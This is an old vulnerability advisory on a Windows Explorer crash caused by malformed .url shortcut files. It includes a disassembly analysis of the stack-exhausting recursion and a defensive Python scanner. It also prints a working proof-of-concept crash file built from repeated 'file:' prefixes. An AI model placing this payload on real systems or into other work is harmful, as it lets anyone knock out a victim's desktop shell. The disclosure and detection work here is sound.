.url file format parsing vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62200925635
Type myhack58
Reporter Anonymous
Modified 2009-12-15T00:00:00


  1. Description

The Windows shell program explorer.exe has a problem when it processes a ".url" file that contains malformed data. A local attacker can exploit this vulnerability to crash the explorer.exe process on the user's machine. If explorer.exe parses a *.url file whose URL has a special format, it crashes; even attempting to delete the file from within Explorer triggers the crash. The vendor has not yet provided a patch or an upgrade, so the vulnerability remains valid at the time of writing.

Assembly code at the actual error address (the stack-probe loop inside __chkstk):

7D5CE6B9   push    ecx
7D5CE6BA   lea     ecx, dword ptr [esp+8]
7D5CE6BE   sub     ecx, 1000
7D5CE6C4   sub     eax, 1000
7D5CE6C9   test    dword ptr [ecx], eax      ; exception address
7D5CE6CB   cmp     eax, 1000
7D5CE6D0   jnb     short 7D5CE6BE
7D5CE6D2   sub     ecx, eax
7D5CE6D4   mov     eax, esp
7D5CE6D6   test    dword ptr [ecx], eax
7D5CE6D8   mov     esp, ecx
7D5CE6DA   mov     ecx, dword ptr [eax]
7D5CE6DC   mov     eax, dword ptr [eax+4]
7D5CE6DF   push    eax
7D5CE6E0   retn

  2. Detailed analysis

In IDA's disassembly the following was found:

public: virtual long __stdcall CFileUrlStub::ParseDisplayName(struct HWND__ *, struct IBindCtx *, unsigned short *, unsigned long *, struct _ITEMIDLIST * *, unsigned long *) proc near
.text:7D6A112C                                         ; DATA XREF: .text:7D5A327Co
.text:7D6A112C
.text:7D6A112C var_20A0        = dword ptr -20A0h
.text:7D6A112C var_209C        = dword ptr -209Ch
.text:7D6A112C var_2098        = dword ptr -2098h
.text:7D6A112C Srch            = word ptr -2094h
.text:7D6A112C var_104C        = dword ptr -104Ch
.text:7D6A112C var_4           = dword ptr -4
.text:7D6A112C arg_C           = dword ptr  14h
.text:7D6A112C arg_14          = dword ptr  1Ch
.text:7D6A112C arg_18          = dword ptr  20h
.text:7D6A112C
.text:7D6A112C                 mov     edi, edi
.text:7D6A112E                 push    ebp
.text:7D6A112F                 mov     ebp, esp
.text:7D6A1131                 mov     eax, 20A0h              ; size of the local stack frame
.text:7D6A1136                 call    __chkstk                ; the function in which the error occurs
.text:7D6A113B                 mov     eax, ___security_cookie
.text:7D6A1140                 push    ebx
.text:7D6A1141                 mov     ebx, [ebp+arg_18]
.text:7D6A1144                 push    esi
.text:7D6A1145                 mov     esi, [ebp+arg_14]
.text:7D6A1148                 push    edi
.text:7D6A1149                 mov     edi, [ebp+arg_C]
.text:7D6A114C                 push    edi
.text:7D6A114D                 mov     [ebp+var_4], eax
.text:7D6A1150                 call    ds:UrlGetLocationW(x)
.text:7D6A1156                 push    0
.text:7D6A1158                 mov     [ebp+var_2098], eax
.text:7D6A115E                 push    6
.text:7D6A1160                 lea     eax, [ebp+var_209C]
.text:7D6A1166                 push    eax
.text:7D6A1167                 lea     eax, [ebp+var_104C+2]
.text:7D6A116D                 push    eax
.text:7D6A116E                 push    edi
.text:7D6A116F                 mov     [ebp+var_20A0], 824h
.text:7D6A1179                 mov     [ebp+var_209C], 823h
.text:7D6A1183                 call    ds:UrlGetPartW(x,x,x,x,x)
.text:7D6A1189                 test    eax, eax
.text:7D6A118B                 jl      short loc_7D6A11A1
.text:7D6A118D                 cmp     [ebp+var_209C], 0
.text:7D6A1194                 jz      short loc_7D6A11A1
.text:7D6A1196                 mov     word ptr [ebp+var_104C], 3Fh
.text:7D6A119F                 jmp     short loc_7D6A11A9
.text:7D6A11A1 ; ---------------------------------------------------------------------------
.text:7D6A11A1
.text:7D6A11A1 loc_7D6A11A1:                           ; CODE XREF: CFileUrlStub::ParseDisplayName(HWND__ *,IBindCtx *,ushort *,ulong *,_ITEMIDLIST * *,ulong *)+5Fj
.text:7D6A11A1                                         ; CFileUrlStub::ParseDisplayName(HWND__ *,IBindCtx *,ushort *,ulong *,_ITEMIDLIST * *,ulong *)+68j
.text:7D6A11A1                 and     word ptr [ebp+var_104C], 0
.text:7D6A11A9
.text:7D6A11A9 loc_7D6A11A9:                           ; CODE XREF: CFileUrlStub::ParseDisplayName(HWND__ *,IBindCtx *,ushort *,ulong *,_ITEMIDLIST * *,ulong *)+73j
.text:7D6A11A9                 push    0
.text:7D6A11AB                 lea     eax, [ebp+var_20A0]
.text:7D6A11B1                 push    eax
.text:7D6A11B2                 lea     eax, [ebp+Srch]
.text:7D6A11B8                 push    eax
.text:7D6A11B9                 push    edi
.text:7D6A11BA                 call    ds:PathCreateFromUrlW(x,x,x,x)   ; this function is recursive
.text:7D6A11C0                 test    eax, eax
.text:7D6A11C2                 jl      short loc_7D6A121B
.text:7D6A11C4                 push    ebx             ; int
.text:7D6A11C5                 push    esi             ; int
.text:7D6A11C6                 xor     edi, edi
.text:7D6A11C8                 push    edi             ; char
.text:7D6A11C9                 push    edi             ; int
.text:7D6A11CA                 lea     eax, [ebp+Srch]
.text:7D6A11D0                 push    eax             ; lpSrch
.text:7D6A11D1                 call    ILCreateFromPathEx(x,x,x,x,x)

Summary: because the parameter checking is not strict, this function keeps calling itself recursively, and each call consumes 0x20A0 bytes of stack. A Windows thread's stack cannot grow without bound, so exceeding its maximum size raises an exception. After the 28th call the stack reaches the maximum Windows allows, and the Explorer process exits abnormally.

  3. Exploit code

[InternetShortcut]
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:

Save the text above into a file with the .url extension; it causes the desktop shell program (Explorer.exe) to raise an error.
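As an added defensive example, not code from the original advisory, the following Python scanner parses a .url file the way a mail or file-share filter would and flags the stacked scheme prefixes shown in the exploit code above. The depth threshold and the two sample files are constructed for illustration.

```python
"""Scanner for the nested "file:" prefix pattern in InternetShortcut (.url)
files.  Added example, not code from the original advisory: the depth
threshold and the sample files below are constructed for illustration."""
import configparser
import re

# One or more "scheme:" prefixes stacked at the start of the URL value.
# Schemes are at least two characters, so a drive letter ("C:") after a
# single "file:" does not count as a second scheme.
_NESTED_SCHEME = re.compile(r'^(?:[a-z][a-z0-9+.-]+:)+', re.IGNORECASE)

def scheme_nesting_depth(url: str) -> int:
    """Return how many scheme prefixes are stacked at the start of url.
    A well-formed URL has exactly one; the crash file above has 28."""
    m = _NESTED_SCHEME.match(url.strip())
    return m.group(0).count(":") if m else 0

def inspect_url_file(text: str, max_depth: int = 1) -> dict:
    """Parse .url file contents (INI syntax) and flag a URL= value whose
    scheme nesting exceeds max_depth.  Unparseable files are flagged too."""
    cp = configparser.RawConfigParser(strict=False, allow_no_value=True,
                                      delimiters=("=",))
    try:
        cp.read_string(text.lstrip("\ufeff"))
    except configparser.Error as exc:
        return {"url": None, "depth": 0, "suspicious": True,
                "reason": f"unparseable .url file: {exc}"}
    section = next((s for s in cp.sections()
                    if s.lower() == "internetshortcut"), None)
    if section is None or not cp.has_option(section, "url"):
        return {"url": None, "depth": 0, "suspicious": False,
                "reason": "no [InternetShortcut] URL= entry"}
    url = cp.get(section, "url") or ""
    depth = scheme_nesting_depth(url)
    return {"url": url, "depth": depth, "suspicious": depth > max_depth,
            "reason": f"{depth} stacked scheme prefix(es)"}

# Constructed samples: a benign shortcut and the advisory's 28x "file:" pattern.
BENIGN_URL_FILE = "[InternetShortcut]\nURL=https://example.invalid/docs\n"
CRASH_URL_FILE = "[InternetShortcut]\nurl=" + "file:" * 28 + "\n"

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_URL_FILE), ("crash", CRASH_URL_FILE)):
        verdict = inspect_url_file(text)
        print(f"{name}: {'SUSPICIOUS' if verdict['suspicious'] else 'ok'} "
              f"({verdict['reason']})")
```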